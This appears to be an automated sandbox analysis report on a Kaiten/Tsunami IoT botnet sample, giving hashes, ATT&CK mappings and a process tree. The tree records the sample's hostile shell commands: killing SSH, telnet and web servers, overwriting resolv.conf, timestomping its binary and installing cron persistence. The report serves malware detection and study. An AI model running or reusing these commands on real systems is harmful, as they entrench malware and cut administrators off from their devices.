kaiten | aa62d2f1c7770196da0af32bf98b270197f4199927b2d9309e62ea57a9a59161

Analysis

max time kernel
50s
max time network
143s
platform
debian-12_armhf
resource
debian12-armhf-20240729-en
resource tags

arch:armhfimage:debian12-armhf-20240729-enkernel:6.1.0-17-armmp-lpaelocale:en-usos:debian-12-armhfsystem
submitted
18-09-2024 21:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118
Size

42KB
MD5

ea047bc4ae766b32a0c80b85b39f140b
SHA1

9dea25da47ba31c2b93d2f7cf2ac67e0259885e4
SHA256

aa62d2f1c7770196da0af32bf98b270197f4199927b2d9309e62ea57a9a59161
SHA512

f02e19e3dad16c04826cd2eb639788b931fdcdb1d833547addcbcce5f6f699788b57d42095427c811b3d15574a4f3ce9db487fbaff32dd08d68e13c617eb36cf
SSDEEP

768:qSV8OVcRm9+kyUW0+551sPbomVIys5q67DTka6SIejwiSJK3UEg6:5VZcE9XWx8UX5q6Z6aHg6

Score

10^/10

kaiten botnet defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/707-1-0x00008000-0x0002c598-memory.dmp	family_kaiten2

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.

Adversary-in-the-Middle
T1557

Processes:

sh

description ioc process

File opened for modification /etc/resolv.conf sh
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.hMLEbR crontab
Enumerates running processes
Discovers information about currently running processes on the system
Indicator Removal: Timestomp 1 TTPs 2 IoCs
Adversaries may remove indicators of compromise from the host to evade detection.
defense_evasion

Timestomp
T1070.006

Processes:

shtouch

pid process

801 sh
802 touch

description	ioc	process
File opened for modification	/etc/resolv.conf	sh

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.hMLEbR	crontab

pid	process
801	sh
802	touch

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

killallkillallkillallkillallkillallkillallkillallkillallkillallkillallkillallkillallkillallkillallkillallkillallkillall

description	ioc	process
File opened for reading	/proc/143/cmdline	killall
File opened for reading	/proc/17/stat	killall
File opened for reading	/proc/879	killall
File opened for reading	/proc/143	killall
File opened for reading	/proc/19	killall
File opened for reading	/proc/25/stat	killall
File opened for reading	/proc/32/stat	killall
File opened for reading	/proc/207	killall
File opened for reading	/proc/187	killall
File opened for reading	/proc/33/stat	killall
File opened for reading	/proc/625	killall
File opened for reading	/proc/28	killall
File opened for reading	/proc/142	killall
File opened for reading	/proc/362/stat	killall
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/142	killall
File opened for reading	/proc/354/stat	killall
File opened for reading	/proc/35/stat	killall
File opened for reading	/proc/15/stat	killall
File opened for reading	/proc/26	killall
File opened for reading	/proc/345/stat	killall
File opened for reading	/proc/207	killall
File opened for reading	/proc/10	killall
File opened for reading	/proc/8/stat	killall
File opened for reading	/proc/652/stat	killall
File opened for reading	/proc/301	killall
File opened for reading	/proc/354	killall
File opened for reading	/proc/718	killall
File opened for reading	/proc/344/stat	killall
File opened for reading	/proc/17	killall
File opened for reading	/proc/25	killall
File opened for reading	/proc/6	killall
File opened for reading	/proc/338	killall
File opened for reading	/proc/718	killall
File opened for reading	/proc/855/stat	killall
File opened for reading	/proc/345/stat	killall
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/22/stat	killall
File opened for reading	/proc/143/stat	killall
File opened for reading	/proc/34/stat	killall
File opened for reading	/proc/704/stat	killall
File opened for reading	/proc/718/stat	killall
File opened for reading	/proc/708	killall
File opened for reading	/proc/45	killall
File opened for reading	/proc/853/stat	killall
File opened for reading	/proc/42	killall
File opened for reading	/proc/187/stat	killall
File opened for reading	/proc/873/stat	killall
File opened for reading	/proc/27/stat	killall
File opened for reading	/proc/4	killall
File opened for reading	/proc/350/stat	killall
File opened for reading	/proc/73/stat	killall
File opened for reading	/proc/25	killall
File opened for reading	/proc/33/stat	killall
File opened for reading	/proc/4	killall
File opened for reading	/proc/213/stat	killall
File opened for reading	/proc/362	killall
File opened for reading	/proc/12	killall
File opened for reading	/proc/636/stat	killall
File opened for reading	/proc/862/stat	killall
File opened for reading	/proc/20/stat	killall
File opened for reading	/proc/12	killall
File opened for reading	/proc/4	killall
File opened for reading	/proc/681/stat	killall

System Network Configuration Discovery 1 TTPs 8 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

shkillallkillallshshkillallkillallsh

pid process

783 sh
782 killall
784 killall
761 sh
764 sh
763 killall
766 killall
780 sh

pid	process
783	sh
782	killall
784	killall
761	sh
764	sh
763	killall
766	killall
780	sh

/tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118
/tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118
1⤵
PID:707
- /bin/sh
  sh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &"
  2⤵
  PID:710
- /bin/sh
  sh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &"
  2⤵
  PID:713
- /bin/sh
  sh -c "rm -rf /var/run/tty0 > /dev/null 2>&1 &"
  2⤵
  PID:717
- /bin/sh
  sh -c "rm -rf /var/run/tty1 > /dev/null 2>&1 &"
  2⤵
  PID:723
- /bin/sh
  sh -c "rm -rf /var/run/tty2 > /dev/null 2>&1 &"
  2⤵
  PID:726
- /bin/sh
  sh -c "rm -rf /var/run/tty3 > /dev/null 2>&1 &"
  2⤵
  PID:729
- /bin/sh
  sh -c "rm -rf /var/run/tty4 > /dev/null 2>&1 &"
  2⤵
  PID:732
- /bin/sh
  sh -c "rm -rf /var/run/tty5 > /dev/null 2>&1 &"
  2⤵
  PID:735
- /bin/sh
  sh -c "rm -rf /tmp/tty0 > /dev/null 2>&1 &"
  2⤵
  PID:737
- /bin/sh
  sh -c "rm -rf /tmp/tty1 > /dev/null 2>&1 &"
  2⤵
  PID:740
- /bin/sh
  sh -c "rm -rf /tmp/tty2 > /dev/null 2>&1 &"
  2⤵
  PID:743
- /bin/sh
  sh -c "rm -rf /tmp/tty3 > /dev/null 2>&1 &"
  2⤵
  PID:746
- /bin/sh
  sh -c "rm -rf /tmp/tty4 > /dev/null 2>&1 &"
  2⤵
  PID:749
- /bin/sh
  sh -c "rm -rf /tmp/tty5 > /dev/null 2>&1 &"
  2⤵
  PID:752
- /bin/sh
  sh -c "rm -rf /var/run/pty > /dev/null 2>&1 &"
  2⤵
  PID:756
- /bin/sh
  sh -c "killall -9 arm > /dev/null 2>&1 &"
  2⤵
  PID:759
- /bin/sh
  sh -c "killall -9 mips > /dev/null 2>&1 &"
  2⤵
  - System Network Configuration Discovery
  PID:761
- /bin/sh
  sh -c "killall -9 mipsel > /dev/null 2>&1 &"
  2⤵
  - System Network Configuration Discovery
  PID:764
- /bin/sh
  sh -c "killall -9 powerpc > /dev/null 2>&1 &"
  2⤵
  PID:767
- /bin/sh
  sh -c "killall -9 ppc > /dev/null 2>&1 &"
  2⤵
  PID:769
- /bin/sh
  sh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"
  2⤵
  PID:772
- /bin/sh
  sh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &"
  2⤵
  PID:775
- /bin/sh
  sh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &"
  2⤵
  - System Network Configuration Discovery
  PID:780
- /bin/sh
  sh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"
  2⤵
  - System Network Configuration Discovery
  PID:783
- /bin/sh
  sh -c "kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &"
  2⤵
  PID:785
- - /usr/bin/cat
    cat "/tmp/.xs/*.pid"
    3⤵
    PID:790
- /bin/sh
  sh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"
  2⤵
  PID:789
- /bin/sh
  sh -c "sleep 432000 && reboot &"
  2⤵
  PID:793
- - /usr/bin/sleep
    sleep 432000
    3⤵
    PID:797
- /bin/sh
  sh -c "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"
  2⤵
  - Writes DNS configuration
  PID:796
- /bin/sh
  sh -c "chmod 700 /tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118 > /dev/null 2>&1 &"
  2⤵
  PID:799
- /bin/sh
  sh -c "touch -acmr /bin/ls /tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118"
  2⤵
  - Indicator Removal: Timestomp
  PID:801
- - /usr/bin/touch
    touch -acmr /bin/ls /tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118
    3⤵
    - Indicator Removal: Timestomp
    PID:802
- /bin/sh
  sh -c "(crontab -l | grep -v \"/tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"
  2⤵
  PID:806
- - /usr/bin/crontab
    crontab -l
    3⤵
    PID:809
- - /usr/bin/grep
    grep -v /tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118
    3⤵
    PID:811
- - /usr/bin/grep
    grep -v "no cron"
    3⤵
    PID:812
- - /usr/bin/grep
    grep -v lesshts/run.sh
    3⤵
    PID:813
- /bin/sh
  sh -c "echo \"* * * * * /tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118 > /dev/null 2>&1 &\" >> /var/run/.x001804289383"
  2⤵
  PID:818
- /bin/sh
  sh -c "crontab /var/run/.x001804289383"
  2⤵
  PID:822
- - /usr/bin/crontab
    crontab /var/run/.x001804289383
    3⤵
    - Creates/modifies Cron job
    PID:823
- /bin/sh
  sh -c "rm -rf /var/run/.x001804289383"
  2⤵
  PID:824
- - /usr/bin/rm
    rm -rf /var/run/.x001804289383
    3⤵
    PID:825
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:826
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:827
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:828
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:829
- /bin/sh
  sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
  2⤵
  PID:838
- - /usr/bin/cat
    cat /var/run/httpd.pid
    3⤵
    PID:841
- /bin/sh
  sh -c "service httpd stop > /dev/null 2>&1 &"
  2⤵
  PID:840
- /bin/sh
  sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
  2⤵
  PID:843
- /bin/sh
  sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
  2⤵
  PID:845
- /bin/sh
  sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
  2⤵
  PID:849
- - /usr/bin/cat
    cat /var/run/thttpd.pid
    3⤵
    PID:852
- /bin/sh
  sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
  2⤵
  PID:851
- /bin/sh
  sh -c "nvram set http_enable=0 > /dev/null 2>&1"
  2⤵
  PID:856
- /bin/sh
  sh -c "killall -9 httpd > /dev/null 2>&1 &"
  2⤵
  PID:857
- /bin/sh
  sh -c "service telnetd stop > /dev/null 2>&1 &"
  2⤵
  PID:859
- /bin/sh
  sh -c "service sshd stop > /dev/null 2>&1 &"
  2⤵
  PID:861
- /bin/sh
  sh -c "killall -9 telnetd > /dev/null 2>&1 &"
  2⤵
  PID:863
- /bin/sh
  sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
  2⤵
  PID:867
- /bin/sh
  sh -c "killall -9 dropbear > /dev/null 2>&1 &"
  2⤵
  PID:871
- /bin/sh
  sh -c "killall -9 sshd > /dev/null 2>&1 &"
  2⤵
  PID:876
- /bin/sh
  sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
  2⤵
  PID:881

/usr/bin/rm
rm -rf /var/run/wgsh
1⤵
PID:712

/usr/bin/rm
rm -rf /var/run/bbsh
1⤵
PID:716

/usr/bin/rm
rm -rf /var/run/tty0
1⤵
PID:722

/usr/bin/rm
rm -rf /var/run/tty1
1⤵
PID:725

/usr/bin/rm
rm -rf /var/run/tty2
1⤵
PID:728

/usr/bin/rm
rm -rf /var/run/tty3
1⤵
PID:731

/usr/bin/rm
rm -rf /var/run/tty4
1⤵
PID:734

/usr/bin/rm
rm -rf /var/run/tty5
1⤵
PID:736

/usr/bin/rm
rm -rf /tmp/tty0
1⤵
PID:739

/usr/bin/rm
rm -rf /tmp/tty1
1⤵
PID:742

/usr/bin/rm
rm -rf /tmp/tty2
1⤵
PID:745

/usr/bin/rm
rm -rf /tmp/tty3
1⤵
PID:747

/usr/bin/rm
rm -rf /tmp/tty4
1⤵
PID:751

/usr/bin/rm
rm -rf /tmp/tty5
1⤵
PID:754

/usr/bin/rm
rm -rf /var/run/pty
1⤵
PID:758

/usr/bin/killall
killall -9 arm
1⤵
- Reads runtime system information
PID:760

/usr/bin/killall
killall -9 mips
1⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:763

/usr/bin/killall
killall -9 mipsel
1⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:766

/usr/bin/killall
killall -9 powerpc
1⤵
- Reads runtime system information
PID:768

/usr/bin/killall
killall -9 ppc
1⤵
- Reads runtime system information
PID:771

/usr/bin/killall
killall -9 daemon.armv4l.mod
1⤵
- Reads runtime system information
PID:774

/usr/bin/killall
killall -9 daemon.i686.mod
1⤵
- Reads runtime system information
PID:779

/usr/bin/killall
killall -9 daemon.mips.mod
1⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:782

/usr/bin/killall
killall -9 daemon.mipsel.mod
1⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:784

/usr/bin/rm
rm -rf "/tmp/.xs/*"
1⤵
PID:792

/usr/bin/chmod
chmod 700 /tmp/ea047bc4ae766b32a0c80b85b39f140b_JaffaCakes118
1⤵
PID:800

/usr/sbin/service
service httpd stop
1⤵
PID:842
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:846
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:847
- /usr/bin/systemctl
  systemctl list-unit-files --full "--type=socket"
  2⤵
  PID:854
- /usr/bin/sed
  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
  2⤵
  PID:855

/usr/bin/killall
killall -9 mini_httpd
1⤵
- Reads runtime system information
PID:844

/usr/bin/killall
killall -9 minihttpd
1⤵
- Reads runtime system information
PID:848

/usr/bin/killall
killall -9 httpd
1⤵
- Reads runtime system information
PID:858

/usr/sbin/service
service telnetd stop
1⤵
PID:860
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:864
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:865
- /usr/bin/systemctl
  systemctl list-unit-files --full "--type=socket"
  2⤵
  PID:873
- /usr/bin/sed
  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
  2⤵
  PID:874

/usr/sbin/service
service sshd stop
1⤵
PID:862
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:868
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:869
- /usr/bin/systemctl
  systemctl list-unit-files --full "--type=socket"
  2⤵
  PID:878
- /usr/bin/sed
  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
  2⤵
  PID:879

/usr/bin/killall
killall -9 telnetd
1⤵
- Reads runtime system information
PID:866

/usr/bin/killall
killall -9 utelnetd
1⤵
- Reads runtime system information
PID:870

/usr/bin/killall
killall -9 dropbear
1⤵
- Reads runtime system information
PID:875

/usr/bin/killall
killall -9 sshd
1⤵
- Reads runtime system information
PID:880

/usr/bin/killall
killall -9 lighttpd
1⤵
- Reads runtime system information
PID:882

/usr/local/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:842

/usr/local/bin/systemctl
systemctl stop httpd.service
1⤵
PID:842

/usr/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:842

/usr/bin/systemctl
systemctl stop httpd.service
1⤵
PID:842

/usr/local/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:862

/usr/local/bin/systemctl
systemctl stop sshd.service
1⤵
PID:862

/usr/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:862

/usr/bin/systemctl
systemctl stop sshd.service
1⤵
PID:862

/usr/local/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:860

/usr/local/bin/systemctl
systemctl stop telnetd.service
1⤵
PID:860

/usr/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:860

/usr/bin/systemctl
systemctl stop telnetd.service
1⤵
PID:860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

Indicator Removal

T1070

Timestomp

T1070.006

Credential Access

Adversary-in-the-Middle

T1557

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Adversary-in-the-Middle

T1557

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/run/.x001804289383

Filesize
81B

MD5
d2b7a2f7941354785f0e99d533666de0

SHA1
c04d282f084b0f701c858ea04ea8f18b1a2839c0

SHA256
a4859f9d584e68c2f7c2d9727eda8c9a1a34ac37a1c8daf90359a977eb197e3b

SHA512
5397b4b1d7f87b28db24c74e6001ce758300daef7cda117e4a325573a615d20ad85cb8d574944dd6be8c726b05a50c3e169fae1ed0a1f564ef2bf8a6be5fe685

Download Submit
/var/spool/cron/crontabs/tmp.hMLEbR

Filesize
278B

MD5
0c9e51d7885bd5a746c4548dbef06a82

SHA1
d0cd9555ac8dcb4faaaff1eb4297f0153f65f835

SHA256
f2d79581927ac4a56d68057241a734afe0a7e5dd82912fe7fb96cccae9a8f46c

SHA512
c4895f09a41a36a7eb0f65df06438ef99e9aa89ec040eca01c952e5642471ac47864a0f19fbb4ca62de8c468104eb8bcd64bb9df36b5bd99aa3e950bd4e83bd6

Download Submit
memory/707-1-0x00008000-0x0002c598-memory.dmp

Download